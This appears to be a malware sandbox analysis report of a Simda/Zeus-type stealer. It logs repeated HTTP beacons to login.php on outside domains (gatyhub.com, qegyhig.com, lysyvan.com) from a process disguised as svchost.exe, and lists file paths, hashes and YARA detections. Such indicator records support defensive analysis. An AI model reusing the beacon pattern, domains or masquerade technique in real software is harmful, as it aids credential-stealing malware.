                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bYWdJUqRq9NEDL5moINwz3Whi4u12YvTEYzpYN8UPX8ZHGkAZTtz/CMWVNn10ne7MOZtE6KLOou+dN8nLXIqmw==
                                                                                                                                                                                                            set-cookie: parking_session=b34072de-3677-4c6c-928d-903add77e9d5; expires=Sun, 08 Sep 2024 07:15:26 GMT; path=/


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
59          192.168.2.4  54065        72.52.179.174   80                7524  C:\Windows\apppatch\svchost.exe
Timestamp                            Bytes transferred  Direction  Data
Sep 8, 2024 09:00:27.750976086 CEST  243                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
60          192.168.2.4  54066        72.52.179.174   80                7524  C:\Windows\apppatch\svchost.exe
Timestamp                            Bytes transferred  Direction  Data
Sep 8, 2024 09:00:28.408338070 CEST  243                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  55332        188.114.96.3    443               7524  C:\Windows\apppatch\svchost.exe
Timestamp                Bytes transferred  Direction  Data
2024-09-08 06:58:46 UTC  267                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-09-08 06:58:47 UTC  773                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:47 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93SruJii54aGJ3tSw%2F%2B4%2BmZDBr%2BiJZf3qVhxDobCgus%2Fou%2FJKuTnDSjN0AQRl%2FbzE34kN3Tn2DkcXSzJ%2BPqG79gHijB%2BQuA93KjA%2BOuXJdf6wWV8KunnqpMpUctJRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0d51ae511881-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Ascii: ss-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-contain
                                                                                                                                                                                                            2024-09-08 06:58:47 UTC1369INData Raw: 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e
                                                                                                                                                                                                            Data Ascii: 00;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;lin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 55335 | 188.114.96.3 | 443 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-08 06:58:48 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-09-08 06:58:49 UTC | 763 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:49 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jp2kWtSqF%2Bo7hDgUGx0qZqD5g954kf%2BoZSLMj20kPejZYURwmaDNDjH%2BxAhyQSDovRGE7dcN3bwFOdjn%2BdXSgOdisNiSNTIpPMuDpcckxgymIrjHZGxWk4MDZNE%2BBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0d5b9d4143f9-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 55360 | 188.114.96.3 | 443 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-08 06:59:30 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-09-08 06:59:30 UTC | 900 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:30 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="42.4",amp_style_sanitizer;dur="21.0",amp_tag_and_attribute_sanitizer;dur="17.8",amp_optimizer;dur="7.3"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vP29DjZxQIHlIhf0dMgASlOMmyAkTcyB9GOHriyvsBeehzRJFaESz6LmLY%2FVVTOPapE9KebJxAHE0kOxpxFKJyjy7Q5Y%2BZsCEIo1d%2B8CJ8v8LknzCir%2BKfK6u4ehtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0e622d134370-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  55363        188.114.96.3    443               7524  C:\Windows\apppatch\svchost.exe

Timestamp                Bytes transferred  Direction  Data
2024-09-08 06:59:31 UTC  267                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-09-08 06:59:32 UTC  902                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:32 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="61.2",amp_style_sanitizer;dur="27.2",amp_tag_and_attribute_sanitizer;dur="23.1",amp_optimizer;dur="8.5"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j2xp2Lim%2F7gWUSjjI34R0T7KDe04gNt1BGkt21KYSyFIUP%2BKzR7uzm1DY08ixbVqhQm0HECsZoxlYj7VHPPPN93vcaQEQSXGX7Nr9UvnUTH%2FQCcNum6L%2FxXsN%2BQh9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0e6cbf60437a-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 54050 | 188.114.96.3 | 443 | 7524 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-08 07:00:13 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-09-08 07:00:14 UTC | 775 | IN | HTTP/1.1 404 Not Found
Date: Sun, 08 Sep 2024 07:00:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oKMOtInikg0%2FmNHHQjSa49%2BaG%2B%2FWmcxlBrd%2FJK%2FqI3MUNWI4xIZAyqv5YWv%2F%2Bi8RZ9Wao8W%2FOqX682yXHh7lHwBL6c%2FTE2PmEaf98c3U9%2FcqO2xUfPVnSakNVM9trg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bfd0f6ecafd19bf-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 54057 | 188.114.96.3 | 443 | 7524 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-08 07:00:20 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysyvan.com
Connection: Keep-Alive
2024-09-08 07:00:22 UTC | 902 | IN | HTTP/1.1 404 Not Found
Date: Sun, 08 Sep 2024 07:00:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
server-timing: amp_sanitizer;dur="48.1",amp_style_sanitizer;dur="23.8",amp_tag_and_attribute_sanitizer;dur="20.7",amp_optimizer;dur="8.0"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FUraIUkIVKiNmoYlZk76JgBK02AKSk%2B6%2Fwdt5%2Btu5QDCOlNazCg9Lm2ohHB1sxmCYlJyaJhYwqki9dwzps7A6HhXAfNwUNdbtoImT4%2Ff%2BNovyW4XQQGZ5tGYrdxGUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bfd0f9e9d880f98-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Ascii: layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][h
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70
                                                                                                                                                                                                            Data Ascii: y{display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69
                                                                                                                                                                                                            Data Ascii: ],form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-accordi
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 30 2e 6d 6a 73 22 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 6e 6f 6d 6f 64 75 6c 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2f 61 6d 70 2d 62 69 6e 64 2d 30 2e 31 2e 6d 6a 73 22 20 61 73 79 6e 63 3d 22 22 20 63 75 73 74 6f 6d 2d 65 6c 65 6d 65 6e 74 3d 22 61 6d 70 2d 62 69 6e 64 22 20 74 79 70 65 3d 22 6d 6f 64 75
                                                                                                                                                                                                            Data Ascii: 0.mjs" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0.js" crossorigin="anonymous"></script><script src="https://cdn.ampproject.org/v0/amp-bind-0.1.mjs" async="" custom-element="amp-bind" type="modu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 54059 | 188.114.96.3 | 443 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-08 07:00:23 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-09-08 07:00:25 UTC | 898 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:24 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="42.8",amp_style_sanitizer;dur="21.1",amp_tag_and_attribute_sanitizer;dur="18.6",amp_optimizer;dur="5.9"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zaujCRDVApxRtyGuqSoVE2Cno6mVxbWRnDQjHD6R8nsFDl9UMYPqIPMP7vbrYn%2BJCcl9DPbZpM1x4NaXTzG7gpK6Pmhi9UMUfa%2FfwBakrV%2FXXXteLlNgewzCPDlwhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0fac4fe80f83-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:02:58:41
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\5AFlyarMds.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\5AFlyarMds.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:216'064 bytes
                                                                                                                                                                                                            MD5 hash:FCF6DE7351633752CF96E861D60B2A8C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:02:58:42
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:216'064 bytes
                                                                                                                                                                                                            MD5 hash:9A96CBEB34AD570586652BD7772616D6
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000001.00000003.1744696339.0000000000888000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.2309709711.00000000015E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.2310035862.0000000002F60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2323573296.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2323493665.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                            Start time:02:59:16
                                                                                                                                                                                                            Start date:08/09/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe"
                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
